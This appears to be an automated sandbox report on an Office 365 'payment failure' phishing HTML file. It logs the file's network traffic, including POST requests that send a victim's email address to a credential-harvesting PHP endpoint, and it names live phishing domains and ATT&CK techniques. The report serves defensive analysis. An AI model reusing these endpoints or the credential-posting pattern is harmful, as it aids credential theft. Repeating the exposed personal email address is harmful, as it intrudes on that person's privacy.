2024-12-17 18:57:33 UTC	692	OUT	POST /app/stiktk.php HTTP/1.1 Host: ajx6f16w140.chiliesdigital.co.za Connection: keep-alive Content-Length: 36 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: https://7royps9o5i0ithqegr.topshelfdog.com:8443 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:33 UTC	36	OUT	Data Raw: 75 73 72 6e 3d 61 73 68 74 61 72 2e 6a 75 6e 61 69 64 25 34 30 6d 69 74 65 6c 2e 63 6f 6d 26 70 73 72 64 3d Data Ascii: usrn=ashtar.junaid%40mitel.com&psrd=
2024-12-17 18:57:34 UTC	960	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 18:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9V6ZYm513TKoAH%2BrBJzVnpPnU5s3vtOG2ner5QflgLqxTz6GgdWDaheUygcdPN86ncl5tFYs4jeVE2ojzvVBWkyDklb29aL2JnJSCwTOgTOW6hQaT70ht9nm%2FR%2BACOKJMK2Dm82vVFidOAFXEs2QqIHJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3923b7e8dd0f42-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1432&rtt_var=919&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1328&delivery_rate=985487&cwnd=180&unsent_bytes=0&cid=31a827e93e9fec5e&ts=978&x=0"
2024-12-17 18:57:34 UTC	66	IN	Data Raw: 33 63 0d 0a 20 20 0d 0a 4f 6e 65 20 6f 72 20 62 6f 74 68 20 6f 66 20 74 68 65 20 76 61 6c 75 65 73 20 27 75 73 72 6e 27 20 61 6e 64 20 27 70 73 72 64 27 20 61 72 65 20 6d 69 73 73 69 6e 67 2e 0d 0a Data Ascii: 3c One or both of the values 'usrn' and 'psrd' are missing.
2024-12-17 18:57:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49776	104.21.81.229	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:36 UTC	370	OUT	GET /app/stiktk.php HTTP/1.1 Host: ajx6f16w140.chiliesdigital.co.za Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:37 UTC	967	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 18:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hfamrzPwsZSOHnpV4iOuEks45eudNcY9qGIzLWx83ITbffYRFn0%2BtstLQXzviaahabPF%2FFshL3rcFjiRXT3s9FJ87%2FpObjfqwE9nK28VcKU7LhybZU8%2Fh0Ec%2FXqsl9%2Bp5kMfwET4e5jUh29LcUBwhSZ1OA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3923cd2c5f4381-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=948&delivery_rate=1793611&cwnd=211&unsent_bytes=0&cid=88985d64fb659ed2&ts=1027&x=0"
2024-12-17 18:57:37 UTC	66	IN	Data Raw: 33 63 0d 0a 20 20 0d 0a 4f 6e 65 20 6f 72 20 62 6f 74 68 20 6f 66 20 74 68 65 20 76 61 6c 75 65 73 20 27 75 73 72 6e 27 20 61 6e 64 20 27 70 73 72 64 27 20 61 72 65 20 6d 69 73 73 69 6e 67 2e 0d 0a Data Ascii: 3c One or both of the values 'usrn' and 'psrd' are missing.
2024-12-17 18:57:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49775	52.98.95.210	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:37 UTC	702	OUT	GET /Encryption/ErrorPage.aspx?src=0&code=10&be=DM8PR09MB6088&fe=BL1PR13CA0351.NAMPRD13.PROD.OUTLOOK.COM HTTP/1.1 Host: outlook.office365.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:37 UTC	725	IN	HTTP/1.1 404 Vary: Origin Server: Microsoft-IIS/10.0 request-id: 1cbf5a72-7add-474e-82a0-2be1a26413e9 X-CalculatedBETarget: DX3P273MB1472.AREP273.PROD.OUTLOOK.COM X-BackEndHttpStatus: 404 Set-Cookie: X-E4E-CorrelationId=dc41f650-4d09-42f1-943b-aa9841cd29b3; path=/; secure; samesite=none; httponly Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true X-Proxy-RoutingCorrectness: 1 Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-Proxy-BackendServerStatus: 404 X-FirstHopCafeEFZ: DXB X-FEProxyInfo: DXXP273CA0015.AREP273.PROD.OUTLOOK.COM X-FEEFZInfo: DXB X-Powered-By: ASP.NET X-FEServer: DXXP273CA0015 Date: Tue, 17 Dec 2024 18:57:36 GMT Connection: close Content-Length: 0

Target ID:	0
Start time:	13:56:58
Start date:	17/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_Failure_Notice_Office365_sdf_[53487].html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	13:56:58
Start date:	17/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1278736899986524459,5604657142336918687,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://ajx6f16w140.chiliesdigital.co.za/app/stiktk.php	Avira URL Cloud: Label: malware
Source: https://kasumbo.com/smarty/xls_v1.6/tail-spin.svg	Avira URL Cloud: Label: phishing

Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Payment_Failure_Not... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. While the script appears to have some legitimate functionality, such as loading an iframe and adding random noise to the DOM, the overall level of obfuscation and the potential for malicious activities raises significant concerns. The risk score is on the higher end due to the combination of these factors.
Source: 0.2.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://7royps9o5i0ithqegr.topshelfdog.com:8443/im... The script contains heavily obfuscated code and sends data to an external domain (chiliesdigital.co.za) using XMLHttpRequest, which is a high-risk indicator. The domain is suspicious and not widely recognized, adding to the risk. The script's behavior is consistent with data exfiltration attempts, and the obfuscation suggests an intent to hide malicious activity.

Source: Joe Sandbox View	IP Address: 192.229.133.221 192.229.133.221
Source: Joe Sandbox View	IP Address: 108.178.43.142 108.178.43.142
Source: Joe Sandbox View	IP Address: 104.21.81.229 104.21.81.229
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Payment_Failure_Notice_Office365_sdf_[53487].html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html	HTTP Parser: No favicon

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.210
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.210
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /logopedia/images/7/7f/Microsoft_365_Admin.png/revision/latest?cb=20241113153458 HTTP/1.1Host: static.wikia.nocookie.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /logopedia/images/7/7f/Microsoft_365_Admin.png/revision/latest?cb=20241113153458 HTTP/1.1Host: static.wikia.nocookie.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /smarty/xls_v1.6/tail-spin.svg HTTP/1.1Host: kasumbo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /app/stiktk.php HTTP/1.1Host: ajx6f16w140.chiliesdigital.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Encryption/ErrorPage.aspx?src=0&code=10&be=DM8PR09MB6088&fe=BL1PR13CA0351.NAMPRD13.PROD.OUTLOOK.COM HTTP/1.1Host: outlook.office365.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: /Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /app/stiktk.php HTTP/1.1Host: ajx6f16w140.chiliesdigital.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Encryption/ErrorPage.aspx?src=0&code=10&be=DM8PR09MB6088&fe=BL1PR13CA0351.NAMPRD13.PROD.OUTLOOK.COM HTTP/1.1Host: outlook.office365.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: /Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: static.wikia.nocookie.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 7royps9o5i0ithqegr.topshelfdog.com
Source: global traffic	DNS traffic detected: DNS query: _8443._https.7royps9o5i0ithqegr.topshelfdog.com
Source: global traffic	DNS traffic detected: DNS query: www.w3schools.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: kasumbo.com
Source: global traffic	DNS traffic detected: DNS query: ajx6f16w140.chiliesdigital.co.za
Source: global traffic	DNS traffic detected: DNS query: outlook.office365.com

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_Failure_Notice_Office365_sdf_[53487].html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3844, Parent PID: 5868

General

Windows Analysis Report
Payment_Failure_Notice_Office365_sdf_[53487].html